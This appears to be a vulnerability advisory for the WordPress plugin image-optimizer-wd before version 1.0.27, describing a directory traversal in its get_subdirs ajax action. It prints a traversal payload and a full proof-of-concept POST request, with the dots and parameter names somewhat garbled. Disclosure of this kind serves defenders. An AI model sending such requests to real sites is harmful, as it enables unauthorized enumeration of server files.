The plugin does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.
- Payload: …/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/ - At the “Other directory” function, select a directory -> At param “dir” add payload: …/…/…/…/…/…/…/…/…/…/ …/ …/…/…/…/…/…/…/…/…/…/… POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 102 Cookie: [Admiin+] action=get_subdirs&nonce;_iowd=xxxxxxxxxx&dir;=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/
CPE | Name | Operator | Version |
---|---|---|---|
image-optimizer-wd | lt | 1.0.27 |